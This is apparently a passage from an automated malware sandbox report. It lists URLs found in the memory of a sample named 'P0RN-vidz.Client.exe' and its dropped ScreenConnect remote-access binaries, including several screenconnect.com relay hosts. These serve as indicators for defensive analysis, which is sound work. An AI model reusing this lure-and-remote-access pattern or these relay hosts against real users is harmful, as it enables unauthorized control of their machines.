                  Source: svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_com
                  Source: svchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbpci
                  Source: P0RN-vidz.Client.exe, 00000000.00000002.2372405201.000000000104B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts..XM6c
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: P0RN-vidz.Client.exe, 00000000.00000002.2372405201.000000000104B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeSta
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000006.00000002.3282365944.0000018F2A600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278676068.000001CCF78D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26DA3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.di
                  Source: P0RN-vidz.Client.exe, 00000000.00000002.2372405201.000000000104B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: dfsvc.exe, 00000001.00000002.3017210252.0000020C40C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.c
                  Source: dfsvc.exe, 00000001.00000002.3017210252.0000020C40C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.cj
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.3016129297.0000020C3F26B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlG
                  Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: dfsvc.exe, 00000001.00000002.3018292902.0000020C40D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabS
                  Source: dfsvc.exe, 00000001.00000002.3017210252.0000020C40C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabt
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: svchost.exe, 00000007.00000003.2115636349.000001CCF8637000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?4ab2d91
                  Source: dfsvc.exe, 00000001.00000002.3017715918.0000020C40C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c203845
                  Source: dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en89B
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2264235619.000001CCF8176000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2205766749.000001CCF8110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3279734727.000001CCF8178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3279466653.000001CCF8100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2206321663.000001CCF810E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2205730424.000001CCF810E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289477636.000001CCF815C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2206424644.000001CCF810E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2117104298.000001CCF8153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:
                  Source: svchost.exe, 00000007.00000003.2289477636.000001CCF815C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278760569.000001CCF78DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2206424644.000001CCF810E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAA
                  Source: svchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 00000007.00000003.2117104298.000001CCF8153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=
                  Source: svchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdx
                  Source: svchost.exe, 00000007.00000002.3279734727.000001CCF8178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-2008
                  Source: svchost.exe, 00000007.00000002.3279734727.000001CCF8178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2psf:textsis-200
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instance-l7g4dh-relay.screenconnect.com:443/
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instance-l7g4dh-relay.screenconnect.com:443/Rr
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000022B8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000020E4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.000000000228F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000023C4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000023FE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000021EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.0000000002476000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000020B5000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.000000000216D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://instance-l7g4dh-relay.screenconnect.com:443/d
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instance-l7g4dh-relay.screenconnect.com:443/vr
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C2730D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://koidesfac.screenconnect.com
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.3018121705.0000020C40CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
                  Source: dfsvc.exe, 00000001.00000002.3017210252.0000020C40C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.3017160630.0000020C40C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2374784781.000001CCF8609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policye.srf
                  Source: svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scg
                  Source: svchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289529280.000001CCF8184000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF812F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF8132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000007.00000002.3278760569.000001CCF78DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26AE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.0000000002002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C2730D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://server-nixd2d85b70-web.screenconnect.com
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: dfsvc.exe, 00000001.00000002.3015186666.0000020C3F1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w=3.org/2001/X
                  Source: P0RN-vidz.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26F11000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26FC7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=806004p
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
